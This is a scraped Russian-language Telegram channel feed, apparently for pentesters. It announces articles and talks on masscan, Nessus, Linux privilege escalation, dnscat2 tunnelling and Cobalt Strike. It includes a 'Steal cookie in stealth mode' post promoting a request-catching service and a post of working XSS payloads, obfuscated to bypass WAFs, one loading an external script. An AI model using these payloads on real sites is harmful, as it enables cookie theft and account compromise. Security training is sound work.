Тему массового сканирования сети интернет на наличие работающих служб, наверное, только ленивый не осветил. Отчего задача стоит не легкая: доступно и насыщенно осветить материал и не залезть в скучные дебри мануала.
Читать
#Сканирование #Инструменты
Please open Telegram to view this post
VIEW IN TELEGRAM
Telegraph
Массовое сканирование. Masscan
Тему массового сканирования сети интернет на наличие работающих служб, наверное, только ленивый не осветил. Отчего задача стоит нелегкая: доступно и насыщенно осветить материал и не залезть в скучные дебри мануала. Программ для массового сканирования достаточно…
❤11⚡5😈2👍1
Nessus
В этом видео мы продолжим изучать полезные для пентеста инструменты, на очереди у нас автоматический сканер уязвимостей - Nessus
Смотреть
#Инструменты
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥10❤7⚡3👍3
В прошлой части мы обсудили немало интересных уязвимостей и способов их перечисления. Не буду затягивать, 3ч. повышения привилегий в ОС Линукс, поехали!
Читать
#Привилегии #Linux
Please open Telegram to view this post
VIEW IN TELEGRAM
Telegraph
Повышение привилегий в ОС Linux, ч.3
Всем привет! В прошлой части мы обсудили немало интересных уязвимостей и способов их перечисления. Не буду затягивать, 3ч. повышения привилегий в ОС Линукс, поехали! В этой статье тебя ждут не менее эффективные способы повысить свои привилегии в системе.…
⚡10🔥3😈3❤1
https://github.com/1N3/IntruderPayloads
#Инструменты #Burp_Suite #Пэйлоады
Please open Telegram to view this post
VIEW IN TELEGRAM
👍16⚡7😈2
Steal cookie in stealth mode
RequestBin - сервис для перехвата HTTP баннера. Вы с лёгкостью можете использовать его в своих целях. Не требует регистрации, создание URL прям здесь и сейчас
https://requestbin.io
Tadn3wb | EAGER7
#Разное #Перехват_запросов
RequestBin - сервис для перехвата HTTP баннера. Вы с лёгкостью можете использовать его в своих целях. Не требует регистрации, создание URL прям здесь и сейчас
https://requestbin.io
Tadn3wb | EAGER7
#Разное #Перехват_запросов
⚡12👍1
Stepyrev_Daniil_Fedorovich_Pre_graduate_practice_2022_text.pdf
246.2 KB
для повышения привилегий пользователя в
цифровой криминалистике
Санкт-Петербург
2022
#Разное #Привилегии
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥11👍7⚡1
Forwarded from E7 | PYTHON
И так , сегодня будет небольшая , но достаточно интересная статья о написание собственного расширения для Burp Suite на Python !
Читать
Please open Telegram to view this post
VIEW IN TELEGRAM
Telegraph
Python for Hacking 4 Часть - Расширение для Burp Suite на Python. IP Changer in HTTP-header
Привет всем ! Сегодня я покажу как работать с Burp Suite , а именно мы напишем постой и в тоже время полезный плагин . Приступим ! Начало... Недавно попался сайт, который блокировал IP посетителя, если тот совершал подозрительные действия. Способ обойти такую…
⚡10👍5🔥1
Кибербезопасность_стратегии_атак_и_обороны_Юрий_Диогенес,_Эрдаль.pdf
18.7 MB
стратегии атак и обороны
Безопасность инфраструктуры
с использованием тактик Красной и Синей команд
Очень годное чтиво на ночь
#Разное #Безопасноcть
Please open Telegram to view this post
VIEW IN TELEGRAM
👍13⚡6🕊4👨💻3
SSTI to bypass WAF
Обход WAF с внедрением шаблонов на стороне сервера в тех случаях, когда RCE невозможен
Обход WAF с внедрением шаблонов на стороне сервера в тех случаях, когда RCE невозможен
{%set a="<svg oYad=aZt`1`>"%}
{{a|replace({'Y':'nlo','Z':'ler'})|raw}}
{%set a='<svg o'%}
{%set b='nload=al'%}
{%set c='ert`1`>'%}
{{a|raw}}{{b|raw}}{{c|raw}}
{{'<svg o'}}{{'nload=al'}}{{'ert`1`>'}}
{{'<sv%snload=%s%s>'|format('g o','aler','t`1`')|raw}}
{{'>)1(trela=daolno gvs<'|reverse|raw}}
{{'<embe'}}{{'d src=//14.rs>'}}
#Обход❤5🕊3👍2🔥2
Уже послезавтра!
В 20:00 (мск)
В докладе мы разберём тему:
"Cobalt strike | Тактика современных угроз".
Разберём такие моменты как: Cobalt Strike’s Beacon полезная нагрузка,DNS Beacon,SMB Beacon,TCP Beacon,Фреймворк уклонения Veil,SSH Сессии,Peer-to-peer C2
Спикер - @e7_redteam
Смотри на нашем ютуб канале - тык
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡7❤5🔥3👍2👨💻2🕊1
DNS это базовый протокол, без которого современный интернет даже и вообразить нельзя. Он представляет собой справочники открытой информации из доменных имен хостов и ip адресов.
Упрощенная схема DNS запросов выглядит следующим образом, но реальный DNS трекинг куда сложнее
Читать
#Уязвимости #Инструменты #Сети
Please open Telegram to view this post
VIEW IN TELEGRAM
Telegraph
DNS-туннелирование Dnscat2
DNS вам не друг, не товарищ, а ВРАГ! Заинтриговал? Тогда погнали. Запасаемся терпением. Материал будет долгий, нудный, в некоторых участках вам самим придется разбираться с ОС, чтобы все это заработало. Огромный респект тем, кто осилит, поймет основу и доведет…
⚡9❤6👍3🔥2😈2🕊1
Please open Telegram to view this post
VIEW IN TELEGRAM
На PortSwigger.net добавились новые таски. Они связаны с Prototype pollution. Это уязвимость JavaScript, которая позволяет злоумышленнику добавлять произвольные свойства к глобальным прототипам.
Таски, кроме ручной работы, основаны на использовании DOM Invader (новой утилитой Burp Suite)
EAGER7
#Лаборатории #Уязвимости #Инструменты
Please open Telegram to view this post
VIEW IN TELEGRAM
👍12⚡2👨💻2
.: - Покопать ли нам винду? 🫥
Сегодня кстати доклад по Cobalt Strike
Мы создали подобие AD, где будем показывать всё на практике
Сегодня кстати доклад по Cobalt Strike
Мы создали подобие AD, где будем показывать всё на практике
Please open Telegram to view this post
VIEW IN TELEGRAM
👍16⚡6🔥1
Уже через час!
В докладе мы разберём тему:
"Cobalt strike | Тактика современных угроз".
Разберём такие моменты как: Cobalt Strike’s Beacon полезная нагрузка,DNS Beacon,SMB Beacon,TCP Beacon,Фреймворк уклонения Veil,SSH Сессии,Peer-to-peer C2
Спикер - @e7_redteam
https://www.youtube.com/watch?v=eXlRJtY82Rg
#Инструменты
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥10⚡3👍2🤩2👨💻2
Делаем ли мы CTF среди подписчиков?
Anonymous Poll
48%
Да, с разбивкой на команды по 3 человека (полный рандом, но равная сортировка по навыкам)
52%
Нет, сделайте лучше доклад по Metasploit
⚡13🔥5😱2